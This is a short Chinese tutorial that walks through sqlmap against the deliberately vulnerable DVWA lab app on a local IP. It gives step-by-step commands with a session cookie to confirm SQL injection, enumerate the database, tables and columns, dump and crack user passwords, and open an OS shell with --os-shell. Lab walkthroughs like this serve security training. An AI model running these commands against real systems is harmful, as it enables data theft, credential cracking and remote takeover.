這里僅僅使用 SQL Injection 模塊的low等級(jí)進(jìn)行演示說(shuō)明sqlmap注入的基本過(guò)程和步驟,,高級(jí)用法可以參考官方手冊(cè)繼續(xù)挖掘,。
輸入框輸入數(shù)字1,之后得到提交參數(shù)后存在注入的URL路徑:
http://192.168.66.92/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
使用firebug獲取登陸后的cookie值,
security=low; security_level=0; PHPSESSID=g3l2gi8djomhlrlf14ha9eku2n
之后對(duì)下面的URL和cookie進(jìn)行替換為上面的到的值,。
第一步:
對(duì)需要登陸才可以訪問(wèn)的路徑需要帶上cookie對(duì)URL進(jìn)行注入判斷
sqlmap -u "http://192.168.66.92/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=g3l2gi8djomhlrlf14ha9eku2n"
![](/upload/attach/201803/201803151539_KRXSY2VPSJEY85C.jpg)
存在注入且得到數(shù)據(jù)庫(kù)版本和操作系統(tǒng)信息
第二步:
–-current-db 獲取數(shù)據(jù)庫(kù)名稱
sqlmap -u "http://192.168.66.92/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=g3l2gi8djomhlrlf14ha9eku2n" --current-db
![](/upload/attach/201803/201803151539_FCH9NPHBHZNMXHS.jpg)
得到數(shù)據(jù)庫(kù)名為DVWA
第三步:
DVWA是上一步獲取的數(shù)據(jù)庫(kù)名稱,,--tables是對(duì)數(shù)據(jù)庫(kù)表名進(jìn)行枚舉
sqlmap -u "http://192.168.66.92/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=g3l2gi8djomhlrlf14ha9eku2n" -D dvwa --tables
![](/upload/attach/201803/201803151539_R9ZF9MPTXFT8ZBH.jpg)
第四步:
獲取到上一步的到的users表名后,,在用--columns對(duì)表中的列進(jìn)行枚舉
sqlmap -u "http://192.168.66.92/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=g3l2gi8djomhlrlf14ha9eku2n" -D dvwa -T users --columns
![](/upload/attach/201803/201803151539_UD5KS83M7BTQYQ3.jpg)
第五步:
獲取user表中的name和password字段
sqlmap -u "http://192.168.66.92/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=g3l2gi8djomhlrlf14ha9eku2n" -D dvwa -T users -C user,password --dump
如果此時(shí)得到的密碼為密文,,SQLmap會(huì)自動(dòng)詢問(wèn),,是否爆破,,選擇“是”即可開(kāi)始使用SQLMAP自帶的字典進(jìn)行爆破。
第六步:
獲取shell,,選擇后臺(tái)語(yǔ)言:
sqlmap -u "http://192.168.66.92/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=g3l2gi8djomhlrlf14ha9eku2n" --os-shell